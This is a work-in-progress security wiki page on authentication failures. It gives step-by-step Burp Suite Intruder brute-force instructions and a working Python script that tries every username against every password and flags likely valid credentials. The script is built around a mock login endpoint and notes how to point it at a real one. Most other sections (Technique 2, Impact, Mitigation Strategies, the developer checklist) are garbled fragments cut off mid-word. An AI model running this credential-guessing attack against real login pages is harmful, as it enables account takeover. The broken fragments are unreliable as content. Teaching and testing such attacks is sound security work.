Authentication Failures (WIP)

Summary

Common types of

  • Detailed

Exploitation Techniques

It's

Username and Password Brute-Force with Burp Suite Intruder

This works against login pages that have no protection against brute-force attacks, such as a maximum number of login attempts, temporary account lockout, rate limiting, or CAPTCHA. Burp Suite Intruder can drive the attack with wordlists of well-known usernames and passwords.

  • Intercept a request to the target login endpoint in the Proxy tab, right-click it, and choose Send to Intruder

  • In the Intruder tab, select the value to be substituted (for example the password parameter) and click Add to mark it as a payload position

  • Check that the field is now enclosed in § markers, which confirms it was selected as a position. In the Payloads panel, add the payloads or load a wordlist, then click Start attack

  • A new window lists each request with its payload. Compare the responses: a different status code, response length, or redirect for one attempt while all the others are identical is a strong indicator of valid credentials
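The Intruder workflow above can be reproduced in a script, which is useful when the comparison step needs to run over thousands of responses. The following is an added example, not code from the original page: it performs a cluster-bomb style attack (every username against every password) and then flags the attempts whose status code and response length differ from the most common response. The login endpoint here is a constructed in-process mock; against a real target you would pass a `send` callable that wraps a real HTTP request and returns `(status_code, body)`.

```python
"""Cluster-bomb credential brute-force with response differencing.

Added example, not part of the original page. mock_login, the wordlists
and the valid credential pair below are constructed for illustration.
"""
from collections import Counter
from itertools import product

# Constructed wordlists standing in for the dictionaries loaded into Intruder.
USERNAMES = ["admin", "root", "jsmith", "service"]
PASSWORDS = ["password", "123456", "Winter2024!", "admin", "letmein"]

# Constructed mock of a login endpoint with no brute-force protection.
# Exactly one pair is valid; every other attempt gets the same generic error.
_VALID = {("jsmith", "Winter2024!")}


def mock_login(username: str, password: str) -> tuple[int, str]:
    """Hypothetical target: returns (HTTP status, response body)."""
    if (username, password) in _VALID:
        return 302, "<html>Redirecting to /dashboard</html>"
    return 200, "<html><p>Invalid username or password.</p></html>"


def cluster_bomb(usernames, passwords, send):
    """Try every username x password combination (Intruder 'Cluster bomb').

    `send(username, password)` must return (status, body). Returns one
    (username, password, status, length) tuple per request, in send order.
    """
    results = []
    for user, pwd in product(usernames, passwords):
        status, body = send(user, pwd)
        results.append((user, pwd, status, len(body)))
    return results


def find_outliers(results):
    """Return the (username, password) pairs whose (status, length)
    differs from the most common response.

    In a dictionary attack the overwhelming majority of attempts fail
    identically, so the most common signature is the failure response and
    anything else is a candidate for valid credentials.
    """
    signatures = Counter((status, length) for _, _, status, length in results)
    baseline, _ = signatures.most_common(1)[0]
    return [(u, p) for u, p, status, length in results
            if (status, length) != baseline]


if __name__ == "__main__":
    res = cluster_bomb(USERNAMES, PASSWORDS, mock_login)
    print(f"{len(res)} requests sent")
    for u, p in find_outliers(res):
        print(f"candidate credentials: {u}:{p}")
```

Length-based differencing is the same heuristic as sorting Intruder's results by the Length column, and it has the same blind spot: if the failure page embeds a per-request value such as a CSRF token or timestamp, lengths vary even for failures and the baseline breaks down. In that case compare on a stable marker in the body (the error message, or the presence of a redirect) instead of raw length.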

Technique 2

The

  • Check

d

  • A

c

Impact

It c

  • Rec

Inform

Mitigation Strategies

It cou

  • Awar

Checklist for Developers and Sysadmins

  • Are
